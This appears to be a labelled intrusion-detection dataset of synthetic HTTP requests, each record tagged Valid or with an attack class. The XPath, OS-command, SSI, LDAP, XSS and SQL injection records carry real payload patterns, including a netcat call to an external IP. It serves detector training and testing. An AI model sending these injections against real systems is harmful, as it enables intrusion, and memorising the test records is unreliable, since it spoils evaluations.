Accept-Charset: windows-1257, x-mac-japanese;q=0.8, x-mac-ce, iso-8859-5;q=0.5
Accept-Encoding: identity;q=0.5, compress;q=0.8, compress;q=0.9
Accept-Language: *
Cache-Control: max-stale
Client-ip: 58.205.87.236
Cookie: llplyE=60;hlib.dyvn=xp_;esn3j=a7lgpfoH2e'r;eI6paNneNm=gw
Cookie2: $Version="82"
Date: Sat, 11 Nov 06 12:12:26 GMT
ETag: W/"4j64j5W8zRKHRER"
Expect: 100-continue
From: ieohme@e4Eagleie.fr
If-Modified-Since: Wed, 27 Aug 08 06:09:50 CET
If-Unmodified-Since: Mon, 25 Sep 06 21:43:00 CET
If-Match: "xsASeimRPSNLBETU"
If-None-Match: *
If-Range: "f5KnwPIPk4ZniIqQGxTK"
Max-Forwards: 940
MIME-Version: 4.9
Pragma: 9ieoEl=Caba4n
Proxy-Authorization: Digest username="8x3ge"
Authorization: Digest username="roInsorm"
Range: -836,37315-,23-
Referer: /0t60l/dsrtiehh/pihuo.exe
TE: trailers
Trailer: If-Range
User-Agent: Mozilla/5.6 (Windows; U; Windows NT 0.7; en-so; rv:1.0.7) Gecko/88706226
UA-CPU: MIPS
UA-Disp: 3636,1361,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 266x8527
Via: 0.4 www.deto.png, HTTP/0.1 www.nol91.css
Transfer-Encoding: eiRdat; dcny=nenlP
Upgrade: utn/6.1, yeidt/4.7, lNyhhy/5.8, Ifi/6.0
Warning: 953 www.h8zy.png "teAfk" "Tue, 09 May 06 12:50:35 CET"
X-Forwarded-For: 194.83.60.232
X-Serial-Number: 8053339262095703049
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2568
Start - Id: 32779
class: Valid
POST /ni/qXvwhP0YbinbWL6/ueuvhdisSoe/rd1JerwgWfJ/chxSn.5v/evioeE1ejrqd/ev21GcUVGC/ayb2z0R9FE0Q_u/op@mlxF8lRVdgn5m/aieteprRq/les9Jfx8.gif? HTTP/1.0
Content-Length: 44
Content-Language: i1bqRsa,Ctm,q
Content-Encoding: identity
Content-Location: http://tdCl2sn.st/a8lImn9/eddeuz.png
Content-MD5: bnF3eWxpOHFpY2h1dWhkaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 11 Jul 05 13:27:11 GMT
Last-Modified: Thu, 05 May 05 23:27:00 UTC
Host: 167.47.55.152
Connection: ps7lb
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: t-uzXAiunH
Cache-Control: min-fresh=447
Client-ip: 105.0.171.235
Cookie: ercnceekyatN=mHHerChaarDeueqjgu;eSupdryHgnntrue=7532311;IesoecinpEm=ht;usto3dachwe=lsxar;1irt=23433;oedoa=8030
Cookie2: $Version="575"
Date: Sat, 08 Apr 06 13:38:54 UTC
ETag: "Yinajk@_Q-@G_cPmwPjA"
Expect: 100-continue
From: tat1a4z@I9Mfqr80t.gov
If-Modified-Since: Tue, 02 Feb 10 07:08:40 CET
If-Unmodified-Since: Thu, 15 May 08 16:30:06 CET
If-Match: *
If-None-Match: "z8E67wPj.JnkApq2"
If-Range: *
Max-Forwards: 20
MIME-Version: 4.5
Pragma: 2xtc='e'
Proxy-Authorization: Basic TG83aUk6Y3h4ZWE4Y3A=
Authorization: Digest response="4eBbaEDCFd8Adb30DEcfb719e9C2BDB6"
Range: 39-,156281-891264,-22
Referer: /aea9e/dmtrrm/grsfteh/ncehjers.jsp
TE: deflate
Trailer: Trailer
User-Agent: Mozilla/1.0 (X11; U; Linux i586 1.2; p3-nt; rv:7.7.5) Gecko/88823135
UA-CPU: x86
UA-Disp: 2397,8345,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 4217x4135
Via: FTP/3.0 105.172.88.236, 4Es/7.6 215.4.15.19, 3.6 232.203.123.227
Transfer-Encoding: deflate
Upgrade: teeo23/2.3, xnsmm/4.8, ier/8.7, vw4/5.1, a5enee/7.1
Warning: 585 232.224.186.123 "moFEY6Tiefdaxpeea5e" 
X-Forwarded-For: 4.132.206.75
X-Serial-Number: 635173454093357601
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

96ehnmtTtmc=ihFsh&hnaxbeAw2enod=obwA@iXvNC

End - Id: 32779
Start - Id: 8177
class: Valid
GET /tBjfCBAWab/e1XxH28o9OkLxrUiGWUl/oS/dbqQj61gg3G42WJ/xe/rsFP4/1KALD.-@W_E3PPK/qciVI4tDngBt/e5y9ploYuf5N/leh3uwhnd/i9LgBehmO2m.jpg?eeOoEtTn=1188534&eamhenfhars7ie=083713&hk2sob3r9tb=yxmli%29+%7Ebandu%5DeepEiht+&BE4rcpR5V96=o-.SOaGh0j&72lqyrauRk=2eIs1mG1o&aan=2877&i1I=6aralb&lie=un0OmuH7l.&oL=44802&idblgyyo=o3MZf0&e8ZhtaccesRlUhN=lnvihlat&90QQinsertuJEaimg=1727958&dmsjaDtgez9ts1=hrcpedcRrj702 HTTP/1.0
Host: 198.187.51.58
Connection: tysf2
Accept: */*
Accept-Charset: windows-1257, utf-7;q=0.5
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 110.38.97.95
Cookie: iYt4zcfnsmyg=6924628;tcGpoe=0;MSzp8usoohl8=Tsej4ae7gaoprhpi;eac2frrocesrEr=52310
Cookie2: $Version="4"
Date: Tue, 18 Mar 08 18:34:24 CET
ETag: "CJ2FHvY_yVxe4mme"
Expect: 100-continue
From: lncsrs1@ssri.net
If-Modified-Since: Fri, 05 Nov 04 03:52:44 GMT
If-Unmodified-Since: Fri, 10 Dec 04 02:22:06 GMT
If-Match: *
If-None-Match: "AyS-uDXWi5wTeNc"
If-Range: Thu, 07 Feb 08 08:15:31 CET
Max-Forwards: 3526
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest cnonce="eolH"
Range: -635
Referer: /q7teee/tFDctv/sws7itaD/qutlt5u/dkrIeS.wav
TE: trailers,trailers
Trailer: If-Range
User-Agent: Mozilla/3.2 (Machintosh; U; Mac OS X 1.0; ia-db; rv:0.0.3) Gecko/27037104
UA-CPU: StrongARM
UA-Disp: 4611,8979,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 1852x378
Via: 7.5 www.elwiokao.html, HTTP/4.5 214.189.70.182
Transfer-Encoding: identity
Upgrade: nas/1.0, rc6/4.9, dtmas/3.2, uIcq/4.7, essls/9.6
Warning: 689 128.202.115.69 "ilceonto6elpOdo9ca" "Thu, 24 Jun 04 13:57:23 UTC"
X-Forwarded-For: 143.171.199.183
X-Serial-Number: 81045574594520616
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8177
Start - Id: 11332
class: Valid
GET /wkA6/693s/QoiysetheIie/coezM/ShKxsamK60/sis8raaradS72ekljae.html?uriE=xEfXbkGk&eyhnllrsnt=9828384&logot7ddEdnht=aIu-ir--9E&0tdnadthnEdwe=eslRh&hceoeL=evhz4oaatorae&smlm=n%26t2&tgayenmmiew=oD894s&uk=e%3F-ln&gdocumentOGeI7tmp=039&eaCe=iun&MautoexecrCnmZz=t+rlikesuxrS&3hgie=n+sthBecrtf&nppsookomnorj=iipbZ1F&Bgss=zcnaccess_log&plsmttoU=oer HTTP/1.0
Host: 24.178.146.164
Connection: close
Accept: image/jpeg, text/plain;q=0.3, application/rtf
Accept-Charset: windows-1254, x-mac-greek;q=0.6, iso-10646-ucs-2
Accept-Encoding: compress, identity;q=0.7, identity;q=0.6
Accept-Language: *
Cache-Control: no-transform
Client-ip: 131.29.29.182
Cookie: -ZDE0VivFO7tmp=eaemshn;etluai;o3t8=ru eg1vhomescript;ueuov8o=5
Cookie2: $Version="8"
Date: Fri, 30 Jun 06 15:55:42 UTC
ETag: "qPpQy3DD3HOBJmaOY1"
Expect: tnrs=resh;eeatour=aTDhmbR
From: e4dstofs@pnO7e.be
If-Modified-Since: Sun, 01 Jul 07 20:39:17 CET
If-Unmodified-Since: Thu, 28 Jan 10 03:19:56 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 03 Apr 06 11:42:28 CET
Max-Forwards: 88
MIME-Version: 3.0
Pragma: lbe0r=edmntre
Proxy-Authorization: Digest opaque="ei6e3ho"
Authorization: Basic bmVlcm8ydDphaXR1b3U=
Range: 9-,461-4858
Referer: http://aStTtahi.net/sol28ete/eeMdebk/tartlb/2shOtbf.pl
TE: trailers,gzip,deflate;q=0.2
Trailer: Proxy-Authorization
User-Agent: Mozilla/0.1 (Windows; U; Win98 7.7; in-rS; rv:4.4.8) Gecko/31314590
UA-CPU: x86
UA-Disp: 139,6791,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 953x845
Via: HTTP/9.7 126.133.228.108:87, 4.6 212.224.192.162
Transfer-Encoding: eoOddT; netshmt=9s5Uea
Upgrade: ax5/0.6
Warning: 653 42.106.86.222 "1e9IMojedeurettAw" 
X-Forwarded-For: 100.230.251.99
X-Serial-Number: 7492268797432274
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11332
Start - Id: 50068
class: XPathInjection
POST /i_@yaU/sariik0ifcE9sie4bw/OteoecerodS/eq5ifpa0jdj.-V/7Lrsm/5UeAfSShCUIFvLEQL/Pi9wwer0/8VLdAfh418bpdm4Mhm/l7rolwyaw.shtml? HTTP/1.1
Content-Length: 67
Content-Language: tD,ie,OsaTea
Content-Encoding: compress
Content-Location: http://rhoi83S.ch/pApokeu2/s6etlTrf/iujArt0e.jpg
Content-MD5: Y2ZvYTB0Z3VzdXVlYVJzaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 08 Sep 08 09:57:45 GMT
Last-Modified: Fri, 30 Apr 10 02:28:22 GMT
Host: 120.211.147.39:80
Connection: sIie
Accept: image/jpeg;q=0.5, text/plain
Accept-Charset: windows-1251;q=0.0, iso-8859-7;q=0.4, ks_c_5601-1987;q=0.9, iso-2022-jp;q=0.6, windows-1254;q=0.4
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 149.101.44.8
Cookie: oUoMStelnet0=dHs9rie1'   or     (i   <    count(9h/child::text())   and   j <   count(ooda/child::comment()) and    k    <    count(eeT/child::*)    ) or  'oty8haae'    =  ' l3tznt'   or;ilnrae7dc6letto=10282453
Cookie2: $Version="067"
Date: Mon, 29 Aug 05 20:14:08 GMT
ETag: "OQ00ds6-4qTz@xRodc2"
Expect: 100-continue
From: fmsevou7@scdhg.org
If-Modified-Since: Sat, 25 Oct 08 22:21:04 GMT
If-Unmodified-Since: Sun, 08 Jun 08 23:55:09 GMT
If-Match: "3p.b.KGpiqrN..9ec"
If-None-Match: *
If-Range: Tue, 11 May 04 21:33:41 UTC
Max-Forwards: 84
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: tu7eU eQesit=tmNisum
Authorization: ered sOnr=dnqoAe
Range: -54961,-527946
Referer: http://www.wutse6dg.de/zyra93.cgi
TE: trailers
Trailer: If-Match
User-Agent: eioait/3.7
UA-CPU: 68000
UA-OS: Linux
UA-Color: color16
Via: 9.6 209.105.242.150
Transfer-Encoding: gzip
Upgrade: tus/4.8, inaoh/6.3, atrg/7.2
Warning: 679 www.eaoIbje.js "depm5wyT" 
X-Forwarded-For: 109.8.17.168
X-Serial-Number: 479154510774494
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

_Y3YQVClpf-=23599773&ti4hDwne=y3K&_OWUBp=pwget&i0nay8gmaeo5=tKP0lUM

End - Id: 50068
Start - Id: 43595
class: OsCommanding
GET /bBQsyRhakHvZ/ZEeN8Lt8e.jpeg?oeno8taIsoCthii=0&obhc4hrunfaie=489&EcsltwcfIa=%7C++++%2Fusr%2Fbin%2Fnc+-vvv+++124.77.177.139+++++80%2500&nNns9su=0&e8Rosi1=iTadaaahaia&slaax6Rhten=0627194&4zsRozo0l=aBM&sndWteItf8rv=225354&a30gnIgWte=netcattreplace+oIoje1&Gwhohstisshat=n5oe0childe&OVnetcat1Q18R68Y=wqtpesd+o7 HTTP/1.1
Host: www.ltgnyoA.com
Connection: close
Accept: text/*;q=0.8
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: min-fresh=92559
Client-ip: 229.233.28.110
Cookie: lethR6u=nr=3e
Cookie2: $Version="7"
Date: Mon, 09 Aug 04 24:10:11 CET
ETag: "4k2b-aFzaYNwu5THDb"
Expect: gtmnl0e=x4oheja
From: uiaeltm@8ehtblt.biz
If-Modified-Since: Mon, 22 May 06 14:29:25 CET
If-Unmodified-Since: Sat, 01 Jan 05 17:36:33 CET
If-Match: *
If-None-Match: "PrDDuqcxo03A.BA0"
If-Range: Mon, 06 Oct 08 14:30:20 UTC
Max-Forwards: 940
MIME-Version: 6.7
Pragma: y=disno
Proxy-Authorization: gJons gtoaie=6vpernh8
Authorization: NTLM MmRpa29lbHJldUhzYW95aHJvbW5lcXJudGF4SWRlYWtpaWVPSGhsdXI2
Range: -9900
Referer: http://www.nsdp.com/lrfe/e2yyH5/Jeoac/Ii6ttr3.mspx
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: 27acgtOvxtmuleil3
UA-CPU: PowerPC
UA-Disp: 084,5683,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 279x772
Via: HTTP/4.5 www.TssWz.tiff:645, HTTP/3.6 25.172.71.120, 8.7 4.202.76.11
Transfer-Encoding: gzip
Upgrade: wyme/7.1
Warning: 547 www.oi2semdf.png "dorhn7hdmp" 
X-Forwarded-For: 25.170.198.152
X-Serial-Number: 597498125488079
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43595
Start - Id: 34450
class: Valid
PUT /4insertOKT9S7/t8/allC0i3r2RciTW/e7shawz9eo1sshXiri/ea4Tt2/aJC7qWc2J/Sn/twca/rleeHdz.php3? HTTP/1.0
Content-Length: 124
Content-Language: dsirtc9,0dtt
Content-Encoding: deflate
Content-Location: /y9cdpiEh/owts0e/komarc.msf
Content-MD5: dGFMcHRJTG5haXNvaWFpcQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 29 Nov 07 04:53:04 CET
Last-Modified: Thu, 26 Feb 09 19:14:45 CET
Host: 202.38.160.45:628
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: no-cache
Client-ip: 201.164.185.17
Cookie: xa1ietemctd=hr8ueecn2tDepnefkn;hnauea=7114460105;tio3ttsN=ar samwinsertnw]rif;iksat5a4a=utdg
Cookie2: $Version="7"
Date: Sun, 02 Oct 05 13:52:15 GMT
ETag: W/"VTVxaOMxcvF7Rcul"
Expect: 100-continue
From: 7mfJfrJ@Etuoenx85.it
If-Modified-Since: Sat, 20 Nov 04 18:07:26 CET
If-Unmodified-Since: Sun, 28 Nov 04 17:52:19 GMT
If-Match: "8MPq0-2Co4elTHx2Bp"
If-None-Match: "YLVVmvv2@3yYrzldm0r"
If-Range: "UNh22n3t@BNAm4UrVu.D"
Max-Forwards: 1057
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: Basic Y3k0YWRhaGU6M2tlZQ==
Authorization: Digest username="bswok"
Range: 89576-1500,-52603
Referer: /4ysni.avi
TE: trailers,trailers,trailers
Trailer: If-None-Match
User-Agent: Mozilla/9.3 (compatible; MSIE 2.9; Linux i586; kEG0; W4l5rcv5ge; atIta6thhf)
UA-CPU: StrongARM
UA-Disp: 7247,384,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 3150x9630
Via: HTTP/4.5 56.32.217.241, 5.2 225.107.44.145
Transfer-Encoding: deflate
Upgrade: 4agtmH/1.6, n1htee/7.1, piys/1.3, atLsg/8.3
Warning: 105 137.166.167.66 "0koTah" 
X-Forwarded-For: 229.28.6.246
X-Serial-Number: 170241372913166600
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~

thf4lregs1sodoi=648327462&zeAuteqhc9i=s3eio4nNftrthhe&srmotoar=ihYue+tiao0ss&oU8b=su1t&yoLtv9te=718&sf=leadmin&2nmomsDl=sh

End - Id: 34450
Start - Id: 49209
class: XPathInjection
GET /nQzcqXsdkdpPtcgjRXz/tAm1sbhHqai/sgit8awi5rrem9/hdrU24nEKR/n7s5kudd.cgi?53hh3s2arv=j7PyD&t0hpnhphe=orlide5h%27+or+1%3C+++edooxO%2FZeintk%2F5dn8%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D298%5D++or+++++%27ted%27%3D++%27 HTTP/1.0
Host: 181.29.201.27:80
Connection: close
Accept: application/x-tar, audio/*;q=0.3
Accept-Charset: x-mac-ce;q=0.1, windows-1252;q=0.1
Accept-Encoding: *
Accept-Language: irylh-s;q=0.1, dotyiee-Yt;q=0.5, eT-aue1cdiU;q=0.5
Cache-Control: max-age=268
Client-ip: 0.187.188.191
Cookie: ncbyJ=5;jI@@Z0LLR5processing-instruction=uHmZ-lY2rN;iXbtcEapXcfnfd=4421850;_2zWKjBtelnetQ5=noicpdvaofhemcplg;qoopoHa=siameif3LswcRh;t9mksmxhki=oidg
Cookie2: $Version="19"
Date: Mon, 17 Jan 05 22:11:11 GMT
ETag: W/"PMFtKm7M45ftXYT2iM8i"
Expect: h28tt
From: lCae@ni91.be
If-Modified-Since: Tue, 20 Jun 06 07:08:49 GMT
If-Unmodified-Since: Sun, 04 Oct 09 16:17:47 GMT
If-Match: "ncFI5WbOf.yRmo2jr"
If-None-Match: *
If-Range: Thu, 24 Apr 08 20:09:51 CET
Max-Forwards: 4163
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: Basic MWd0YTpydGplZWl3
Authorization: Digest nonce
Range: -392691
Referer: /gstlF.dll
TE: chunked,trailers
Trailer: Authorization
User-Agent: evHehheEEq/3.5.6.0
UA-CPU: 68000
UA-Disp: 2354,727,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 6245x946
Via: 8.2 25.152.84.181, 2.1 135.117.29.145, FTP/4.0 230.172.96.139
Transfer-Encoding: aofh
Upgrade: wtrfa/2.8, tto/9.5, nvs/5.2
Warning: 738 www.iaeo.png "RrzpoiHnn" "Fri, 27 Feb 09 20:57:20 CET"
X-Forwarded-For: 243.220.220.113
X-Serial-Number: 094897870
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 49209
Start - Id: 39447
class: SSI
GET /tww0hnvttVGXq/i0u5EB/cLe/oivpeb6Mluhi/Ddw4nettpEelsDse/l6cQUtRKQjA.cwL/acqe/zSAVTqh_IsOV/mIqpQ-MZ5m.Hz/sUpnJo/Pr8.jpg?oeuxeeha=13843&bafnvdink4ryre1=h5t8z&auigeo3Nrr=anUnthprxi&ssoxie0dt6iat=341&eciyebltoemote=rGay14ocGdXy&7ESeomhed=%296&y0_Gvayo4e=%3C%21--%23email+fromhost%3D%22www.abNlne.com%22+tohost%3D%22mailbox.itgc9.com%22+message%3D%22Evbesf+Ehibnn+eoOetau+nUu%22+fromaddress%3D%22Afubh.com%22+toaddress%3D%22p1a.rahaD.com%22+subject%3D%22at%22+sender%3D%22mtf.com%22+replyto%3D%22hSoed0.com%22+cc%3D%22wde%22+inreplyto%3D%225e+nht+ugtOa%22+id%3D%22laemail%22+--%3E&uneeeprRs=tSsn%28e&itoCrhieI1nesna=488&Mtermapi7ie=+a&eeiecphc=%5B7sialIoGmnMer&eznioooteon=76028 HTTP/1.1
Host: 49.55.226.148:80
Connection: rdnciri
Accept: image/gif
Accept-Charset: *
Accept-Encoding: deflate;q=0.5, gzip;q=0.1, compress;q=0.3, identity
Accept-Language: *
Cache-Control: min-fresh=2
Client-ip: 179.178.240.191
Cookie: unoEblouhsns=W-tphpz;rrl=9eexnaw
Cookie2: $Version="52"
Date: Wed, 29 Jul 09 04:07:19 UTC
ETag: "4RA_nX6hXk.ECNzh8"
Expect: 100-continue
From: alitInca@hE8o0.it
If-Modified-Since: Tue, 17 Oct 06 20:57:49 UTC
If-Unmodified-Since: Tue, 02 Oct 07 22:55:07 GMT
If-Match: *
If-None-Match: "ez4kgak4gfDr-36P"
If-Range: Sat, 11 Apr 09 11:39:49 GMT
Max-Forwards: 94
MIME-Version: 7.1
Pragma: no-cache
Proxy-Authorization: rashN riiam=cssstki
Authorization: Basic OWRUZGllcm46aW50dER0
Range: 993-
Referer: http://www.tyyvsre.org/glxE/paaopt/eded6.asmx
TE: chunked,gzip;q=0.5
Trailer: Warning
User-Agent: aQAC_N@r http://www.cemeais.net
UA-CPU: Sparc
UA-Disp: 677,8714,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 015x2523
Via: 4.1 155.237.58.63, HTTP/4.9 54.158.83.221, HTTP/8.1 116.225.221.185
Transfer-Encoding: rdrdd
Upgrade: nSr/8.2, bkiiH/4.4, thru4/6.0
Warning: 799 37.15.16.235:0423 "eauhqipdaedde" "Thu, 30 Aug 07 24:57:07 CET"
X-Forwarded-For: 38.112.178.33
X-Serial-Number: 298841177786
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39447
Start - Id: 37168
class: LdapInjection
GET /oVSDm/aN6IjHQzfii5q.html?aoxtwueoh2l4ari=pr6etu&bsnhieO6xe=%29++%28%7C+%28displayName%3Dhad*%29+%28name+++%3D++++had*++++%29%28++mail%3Dhad*+++%29&.Y2include6=twnsph5iozvSee0&eX0842H=S9pTq+update8ust&SGdinputIdropPXHET=iVeWj.Zr0Qd&yfonosoee0hsc=seCyan+zVh HTTP/1.1
Host: www.aae7LWj.de:80
Connection: 9osyaain
Accept: video/*, audio/*
Accept-Charset: *;q=0.7
Accept-Encoding: compress;q=0.7, identity;q=0.9
Accept-Language: tynhuie-y
Cache-Control: no-cache
Client-ip: 188.238.110.194
Cookie: dNf5CwsamJr=49036;hm0r=d5wFf;_Ngzd04LtD=708727;aL6N=em?;aeReivf1iotdw9e=2245326;eiseaspvit=admin2o nu bmailtcr>ee-~rsg
Cookie2: $Version="45"
Date: Wed, 12 Nov 08 04:45:08 GMT
ETag: "cmhDI5J8iYPu8ZT-g7OW"
Expect: eGqmep=9at5aun;pdiah=wrena
From: leAt4Eeo@dfiwc.org
If-Modified-Since: Fri, 24 Jul 09 22:57:41 GMT
If-Unmodified-Since: Thu, 15 Apr 04 10:33:41 CET
If-Match: *
If-None-Match: "D3YV@nqrLZimSBOdBtPb"
If-Range: Sun, 07 May 06 17:45:03 UTC
Max-Forwards: 9220
MIME-Version: 5.3
Pragma: sr='h'
Proxy-Authorization: NTLM SWhyYWEwZXJOR29UdG5pOGh3c3JhYWRyb2pvbkw1c2VycHU=
Authorization: Digest nonce
Range: 183458-,10781-99705
Referer: http://mv5hos.biz/aa3d/n9eeOxe/uhidean.tar
TE: trailers
Trailer: Via
User-Agent: Mozilla/1.4 (Machintosh; U; PPC Mac OS X 8.2; 5n-b6; rv:5.9.9) Gecko/28688664
UA-CPU: 68000
UA-Disp: 303,353,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 5776x2501
Via: FTP/0.9 www.uwlKnn.js, 0.6 166.59.1.110
Transfer-Encoding: deflate
Upgrade: Tri/4.5
Warning: 068 www.caus6t.html:451 "nAiwBaHg" 
X-Forwarded-For: 203.59.253.98
X-Serial-Number: 6743183535814854929
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37168
Start - Id: 49510
class: XPathInjection
GET /sUnppeacie2ffedr/y8bClrBk9DbPKww-k/pnmtehe5nbgol41i.nsf?p8w7=libeet&Cj@Bw=crthsIb%27++++or+%28i+++%3C++count%28igkhnn%2Fchild%3A%3Atext%28%29%29+and+++++j+++%3C+++++count%28hh%2Fchild%3A%3Acomment%28%29%29++++and+++k+++%3C+++count%28tph%2Fchild%3A%3A*%29++++%29+or++%27hfGtgie%27++++%3D+++%27+++++ehstslo%27+++or&cOsiysweiclnhn=57&1cnKOT@RPW=16697600&4tlyratp=hr8a HTTP/1.0
Host: www.tje1ler0.fr
Connection: close
Accept: image/png;q=0.2, video/*;q=0.9, video/quicktime;q=0.0
Accept-Charset: *
Accept-Encoding: *;q=0.1
Accept-Language: str4qbn-odaeee
Cache-Control: no-transform
Client-ip: 26.73.126.36
Cookie: fevMaroyuh=3;3rereynqeegLs= ooctnhu;hreiepodd=ozrpa
Cookie2: $Version="988"
Date: Sun, 26 Mar 06 15:00:20 GMT
ETag: "CYNN_kOjXAGsYaD"
Expect: igeeah=za6rsomx;otXlia7e
From: eaatpaso@ksiwaan.org
If-Modified-Since: Tue, 20 Dec 05 08:58:22 GMT
If-Unmodified-Since: Sun, 22 Mar 09 12:46:13 CET
If-Match: "yrIQ92TyCN41oG5-D4hS"
If-None-Match: "jXfoYw5SlSwVNd7CGXV"
If-Range: "lKluLXoO0JEiHZWL_2W"
Max-Forwards: 353
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: ao6tbr qsmelsdm=S7mcd8of
Authorization: NTLM dGVpc3QzbzJuYWFxaHRyY3RyN3JpcmF0ZWV2cjllc2VlOGlu
Range: -88469
Referer: http://s8munni.de/hnetai.gif
TE: trailers,trailers,deflate
Trailer: Date
User-Agent: Mozilla/7.5 (Windows; U; Windows NT 3.2; tn-ei; rv:3.4.0) Gecko/09825073
UA-CPU: Sparc
UA-Disp: 2924,8513,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 4726x3292
Via: 5.4 www.nhzio0eo.gif, 2.6 www.wfwftt.jpeg, i9i/1.1 www.toeOtt.js
Transfer-Encoding: deflate
Upgrade: itnn/7.0, e8wien/4.6, 6sde2/3.7, niNg/1.6
Warning: 646 www.qqkiis.css "nsutrl9tXaNtumo" 
X-Forwarded-For: 113.38.28.52
X-Serial-Number: 201583507
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 49510
Start - Id: 46937
class: XSS
POST /inzER/i@LOyA/qc7wGQd6U3JWR@1ae/Jfkehby/rrTfr97L5t3wmnag3_m/idhgbMeeAra/ie76.tiff? HTTP/1.0
Content-Length: 290
Content-Language: nyN,rsg,tA
Content-Encoding: deflate
Content-Location: http://tmelbw.net/tib6m/goqeerus.jpg
Content-MD5: aG85TmhjYWFzaXRpWmhvTg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 28 Jul 05 08:50:01 CET
Last-Modified: Thu, 28 May 09 07:20:26 UTC
Host: www.ii0e.be
Connection: keep-alive
Accept: text/html, text/plain
Accept-Charset: iso-8859-7, iso-8859-1, utf-7, utf-7, hz-gb-2312
Accept-Encoding: 
Accept-Language: Bege-ue, esRlznoH-1;q=0.8, nyfb-Dgs, afegoHi-haeu
Cache-Control: no-store
Client-ip: 68.207.188.146
Cookie: rt0p2ne6qsArw=wkjeg;pnmpreTonAa=s|yhpasswde;uwyeaezra=e|7tautoexechd5ft~ soa;hlkst= E->;J1JJNreplaceqVautoexecH=nullwmps
Cookie2: $Version="688"
Date: Sat, 20 Jan 07 19:19:56 CET
ETag: W/"zS@IPwMakTh0z0W5imO"
Expect: 100-continue
From: nhatwm@untrh.biz
If-Modified-Since: Mon, 04 Sep 06 09:45:29 CET
If-Unmodified-Since: Mon, 12 May 08 22:06:41 GMT
If-Match: *
If-None-Match: "mDBwr-w9dGnxE36"
If-Range: *
Max-Forwards: 0484
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: Basic Y3BzTW06d3lkc04=
Authorization: NTLM cHhhdGhEYWFjYXplZ21odGllbnBhbnZpbE5maHNvcmll
Range: 455810-240,-24385
Referer: /JehC/bewl9/8msb/thwhnnt4/e1txvs5O.conf
TE: trailers,trailers,deflate;q=0.8
Trailer: Proxy-Authorization
User-Agent: ArsCa/8.7.5.3.6
UA-CPU: MIPS
UA-Disp: 4346,951,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 642x9764
Via: FTP/0.8 www.wkhtrh.gif, 8.0 109.228.109.100:42, soe/1.6 www.eStm.gif
Transfer-Encoding: deflate
Upgrade: sdW/7.9, agrd/5.9, wt6wa9/7.2
Warning: 764 www.ematse.tiff "gAijntrahti" "Thu, 26 Apr 07 12:05:11 GMT"
X-Forwarded-For: 207.203.23.208
X-Serial-Number: 4682138
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

pnnslrhetmo=hgpo 2slikedroplonmt&vphi=<div   style="    binding:    url([http://www.etiset.com/script/neea7ihne.aspx]);  "    >&x8a8NiRs=aeb&daagg=xrtopth3;nh;o&kPGz9V=121762960&mAiivPipeda=:LCE?&nshruatNqdsah3i=9ieo4onihejhtfgi0w&EbwuOrMwo37othI=773

End - Id: 46937
Start - Id: 41783
class: SqlInjection
GET /dsTiu/eN0Uwindow.openOwindow.openscriptreplaceftpN/dqwto/oHwinntCL/l6k@ruyf.vv5Nv_Al/tD8vHt6YbVZz1/hnJRXrY/RGe4elmccAss.mdb?72eIdshttpsinput45=31&haarigmdsDdr=pnwhei9r&goncscro9urn=Okiwiyq&y-._%u=msiti&uErroE9yxTnshso=%27+++group++++by+++++users.id+++having++++78%3D78 HTTP/1.0
Host: www.blrtmu.cz
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate
Accept-Language: *;q=0.9
Cache-Control: eux='b4N'
Client-ip: 19.38.3.115
Cookie: z2HsAL0eGaE9=764;n2aettaecITsea=erscript;dUN4J=1016076;8weeutbhea=5;mNtnze=ntz e
Cookie2: $Version="3"
Date: Fri, 10 Nov 06 23:11:45 GMT
ETag: ".4g273Gu0e1YegQr"
